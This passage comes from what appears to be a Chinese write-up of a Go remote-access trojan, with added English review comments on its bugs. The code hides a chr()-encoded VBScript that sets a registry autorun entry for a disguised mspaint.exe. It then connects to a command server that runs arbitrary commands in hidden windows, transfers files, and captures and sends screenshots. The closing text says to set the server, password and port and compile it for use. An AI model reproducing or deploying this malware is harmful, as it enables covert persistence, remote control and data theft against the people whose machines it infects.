r(103)&chr(32)&chr(97)&chr(100)&chr(100)&chr(32)&chr(72)&chr(75)&chr(69)&chr(89)&chr(95)&chr(76)&chr(79)&chr(67)&chr(65)&chr(76)&chr(95)&chr(77)&chr(65)&chr(67)&chr(72)&chr(73)&chr(78)&chr(69)&chr(92)&chr(83)&chr(79)&chr(70)&chr(84)&chr(87)&chr(65)&chr(82)&chr(69)&chr(92)&chr(77)&chr(105)&chr(99)&chr(114)&chr(111)&chr(115)&chr(111)&chr(102)&chr(116)&chr(92)&chr(87)&chr(105)&chr(110)&chr(100)&chr(111)&chr(119)&chr(115)&chr(92)&chr(67)&chr(117)&chr(114)&chr(114)&chr(101)&chr(110)&chr(116)&chr(86)&chr(101)&chr(114)&chr(115)&chr(105)&chr(111)&chr(110)&chr(92)&chr(82)&chr(117)&chr(110)&chr(32)&chr(47)&chr(118)&chr(32)&chr(65)&chr(85)&chr(84)&chr(79)&chr(82)&chr(85)&chr(78)&chr(32)&chr(47)&chr(116)&chr(32)&chr(82)&chr(69)&chr(71)&chr(95)&chr(83)&chr(90)&chr(32)&chr(47)&chr(100)&chr(32)&chr(67)&chr(58)&chr(92)&chr(80)&chr(114)&chr(111)&chr(103)&chr(114)&chr(97)&chr(109)&chr(68)&chr(97)&chr(116)&chr(97)&chr(92)&chr(109)&chr(115)&chr(112)&chr(97)&chr(105)&chr(110)&chr(116)&chr(46)&chr(101)&chr(120)&chr(101)&chr(32)&chr(47)&chr(102)&chr(34)&chr(44)&chr(118)&chr(98)&chr(104)&chr(105)&chr(100)&chr(101))"), 0666)
	if err2 != nil {
		// Reports the (nil) first error instead of err2.
		log.Fatal(err)
	}
	// Runs add.vbs through cmd, relying on the .vbs file association.
	c := exec.Command("cmd", "/c", "add.vbs")
	c.Run()
	// Removes add.vbs only; test.vbs stays behind. The check tests `err`, not `er`.
	er := os.Remove("add.vbs")
	if err != nil {
		log.Fatal(er)
	}
}
// getScreenshotFilename returns the fixed path a screenshot is written to
// before being read back and sent: %SystemDrive%\ProgramData\tmp.png on
// Windows, a dot-file in /tmp elsewhere. The path never varies and nothing
// in this listing deletes it, so it is a stable on-disk indicator.
func getScreenshotFilename() string {
	if runtime.GOOS != "windows" {
		return "/tmp/.tmp.png"
	}
	return os.Getenv("systemdrive") + "\\ProgramData\\tmp.png"
}
// ConvertToString takes src, whose bytes are in the srcCode charset, and
// returns it as a Go string. Step one decodes src from srcCode to UTF-8
// with mahonia. Step two then feeds the result through a *decoder* for
// tagCode as well (mahonia.NewDecoder, not NewEncoder); for the only caller
// in this file, tagCode is "utf-8", so that pass presumably leaves valid
// UTF-8 untouched. Conversion errors from both steps are discarded.
func ConvertToString(src string, srcCode string, tagCode string) string {
	utf8Text := mahonia.NewDecoder(srcCode).ConvertString(src)
	_, out, _ := mahonia.NewDecoder(tagCode).Translate([]byte(utf8Text), true)
	return string(out)
}
// TakeScreenShot captures every active display with kbinani/screenshot and
// PNG-encodes each one to the single fixed path from getScreenshotFilename.
//
// Review notes:
//   - All displays are written to the same file, so only the last display
//     captured survives for the caller to read back.
//   - On a capture error it calls connect(), which opens a second C2 session
//     and never returns; the loop and the caller are simply abandoned
//     instead of the error being reported.
//   - defer file.Close() inside the loop keeps every handle open until the
//     function returns; os.Create and png.Encode errors are ignored.
//   - The PNG is left on disk at a fixed, predictable path.
func TakeScreenShot() {
	n := screenshot.NumActiveDisplays()
	fpath := getScreenshotFilename()
	for i := 0; i < n; i++ {
		bounds := screenshot.GetDisplayBounds(i)
		img, err := screenshot.CaptureRect(bounds)
		if err != nil {
			connect()
		}
		file, _ := os.Create(fpath)
		defer file.Close()
		png.Encode(file, img)
	}
}
// connect dials the hard-coded server, presents CONNPWD and then serves
// commands until the connection drops. It never returns normally: every exit
// path either recurses into connect() again or calls os.Exit.
//
// Wire format (both directions): one base64 string per line, '\n'-terminated.
// Go's base64 decoder skips '\n', so the trailing newline is harmless, but
// this side decodes commands with StdEncoding while the server encodes them
// with URLEncoding; the alphabets differ for values 62/63, so some commands
// and paths will not survive the trip intact.
//
// Review notes:
//   - A dial failure recurses without any delay or backoff: unbounded
//     recursion depth and a CPU spin while the server is unreachable.
//   - A fresh bufio.Reader is created for every read; anything it read ahead
//     past the first line is lost, which matters when the server sends a
//     command and its follow-up lines back to back.
//   - Only io.EOF is handled; any other read error falls through with an
//     empty message, which the default branch then tries to execute.
//   - All decode errors are ignored.
//   - The default branch runs whatever the server sends, split on spaces
//     with no quoting, with a hidden window — the "arbitrary command" feature.
//   - "upload" writes to a server-supplied path with mode 777 (decimal,
//     i.e. 0o1411); the path is not confined in any way.
func connect() {
	conn, err := net.Dial("tcp", IP)
	if err != nil {
		fmt.Println("Connection...")
		// Retry by recursion, immediately and forever.
		for {
			connect()
		}
	}
	// Authenticate: first line is base64(CONNPWD).
	errMsg := base64.URLEncoding.EncodeToString([]byte(CONNPWD))
	conn.Write([]byte(string(errMsg) + "\n"))
	fmt.Println("Connection success...")
	for {
		// Wait for one command line ('\n'-terminated, base64-encoded).
		message, err := bufio.NewReader(conn).ReadString('\n')
		if err == io.EOF {
			// Server went away: reconnect (recursively; this frame never resumes).
			conn.Close()
			connect()
		}
		// Decode the command (StdEncoding, although the server used URLEncoding).
		decodedCase, _ := base64.StdEncoding.DecodeString(message)
		command := string(decodedCase)
		cmdParameter := strings.Split(command, " ")
		switch cmdParameter[0] {
		case "back":
			// Server rejected the password; drop the socket and try again.
			conn.Close()
			connect()
		case "exit":
			// Operator asked this client to terminate.
			conn.Close()
			os.Exit(0)
		case "charset":
			// "charset <name>": code page assumed for command output from now on.
			if len(cmdParameter) == 2 {
				charset = cmdParameter[1]
			}
		case "upload":
			// Two more lines follow: the output path, then the file data.
			uploadOutput, _ := bufio.NewReader(conn).ReadString('\n')
			decodeOutput, _ := base64.StdEncoding.DecodeString(uploadOutput)
			encData, _ := bufio.NewReader(conn).ReadString('\n')
			decData, _ := base64.URLEncoding.DecodeString(encData)
			ioutil.WriteFile(string(decodeOutput), []byte(decData), 777)
		case "download":
			// Step 1: nothing to do for the command itself; the next line is the path.
			download, _ := bufio.NewReader(conn).ReadString('\n')
			decodeDownload, _ := base64.StdEncoding.DecodeString(download)
			file, err := ioutil.ReadFile(string(decodeDownload))
			if err != nil {
				// File unreadable: report it as a plain output line.
				errMsg := base64.URLEncoding.EncodeToString([]byte("[!] File not found!"))
				conn.Write([]byte(string(errMsg) + "\n"))
				break
			}
			// Announce the transfer so the server reads the next line as file data.
			srvDownloadMsg := base64.URLEncoding.EncodeToString([]byte("download"))
			conn.Write([]byte(string(srvDownloadMsg) + "\n"))
			// Send the file bytes as one base64 line.
			encData := base64.URLEncoding.EncodeToString(file)
			conn.Write([]byte(string(encData) + "\n"))
		case "screenshot":
			TakeScreenShot()
			file, err := ioutil.ReadFile(getScreenshotFilename())
			if err != nil {
				// Temp PNG missing: report it as a plain output line.
				errMsg := base64.URLEncoding.EncodeToString([]byte("[!] File not found!"))
				conn.Write([]byte(string(errMsg) + "\n"))
				break
			}
			// Announce the transfer so the server reads the next line as image data.
			srvDownloadMsg := base64.URLEncoding.EncodeToString([]byte("screenshot"))
			conn.Write([]byte(string(srvDownloadMsg) + "\n"))
			// Send the PNG bytes as one base64 line.
			encData := base64.URLEncoding.EncodeToString(file)
			conn.Write([]byte(string(encData) + "\n"))
		case "getos":
			// Sent by the server's "session" command; rewritten into a shell
			// command and handled by the default branch below.
			if runtime.GOOS == "windows" {
				command = "wmic os get name"
			} else {
				command = "uname -a"
			}
			fallthrough
		default:
			// Execute the line as <program> <args...>, split on single spaces.
			cmdArray := strings.Split(command, " ")
			cmdSlice := cmdArray[1:len(cmdArray)]
			out, outerr := mCommandTimeOut(cmdArray[0], cmdSlice...)
			if outerr != nil {
				out = []byte(outerr.Error())
			}
			// Transcode the output when the operator set a non-UTF-8 code page.
			if charset != "utf-8" {
				out = []byte(ConvertToString(string(out), charset, "utf-8"))
			}
			encoded := base64.StdEncoding.EncodeToString(out)
			conn.Write([]byte(encoded + "\n"))
		}
	}
}
// mCommandTimeOut runs name with arg... and returns its combined stdout and
// stderr. The child is bound to a context with the package-level Timeout;
// when that expires exec kills the process and the partial output is
// returned together with the error. HideWindow keeps a console window from
// appearing on Windows (the field only exists in the Windows build of
// syscall, so this file does not compile elsewhere as written).
func mCommandTimeOut(name string, arg ...string) ([]byte, error) {
	ctx, cancel := context.WithTimeout(context.Background(), Timeout)
	defer cancel()

	var output bytes.Buffer
	cmd := exec.CommandContext(ctx, name, arg...)
	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	cmd.Stdout = &output
	cmd.Stderr = &output

	// Run is Start followed by Wait; a failure in either is reported
	// together with whatever the child managed to write.
	err := cmd.Run()
	return output.Bytes(), err
}
// mCommand launches name with arg... and does not wait for it: Start only,
// no Wait, so the child keeps running after the caller returns (main uses
// this to hand off to the copy in ProgramData). A launch error is printed
// and otherwise ignored. HideWindow suppresses the console window on
// Windows (Windows-only field in syscall.SysProcAttr).
func mCommand(name string, arg ...string) {
	child := exec.Command(name, arg...)
	child.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	if err := child.Start(); err != nil {
		fmt.Println(err)
	}
}
0x05 关于使用
修改好,其中的一些连接参数,密码,端口,编译成EXE即可,Golang支持跨平台,也可以编译成Linux版本,进行远程控制。